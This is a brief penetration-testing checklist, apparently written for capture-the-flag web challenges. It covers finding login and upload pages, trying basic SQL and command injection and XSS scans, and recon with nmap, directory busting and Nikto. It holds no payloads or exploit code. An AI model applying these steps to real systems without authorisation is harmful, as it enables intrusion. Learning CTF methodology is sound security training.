Methodology

Dummy Stuff

  • Find all login pages
  • Find all upload/content send mechanisms
  • View source of pages
  • Check out cookies (base 64/ plaintext)
  • Look for Robots.txt

Attack login pages

  • try baby SQL inject on each one
  • try baby command inject on each one

Attack input pages

  • try baby command inject on each one
  • run an XSS scan

Recon

  • Nmap -A
    • Services on weird ports are common
  • Dirbust for 2 minutes if nothing against it.
    • Admin panels might pop up
  • Vuln scan with Nikto. If you have a real commercial one, hit it, but you probably won't find anything. CTF challenges aren't supposed to be solved by a scanner.

Fake it from there.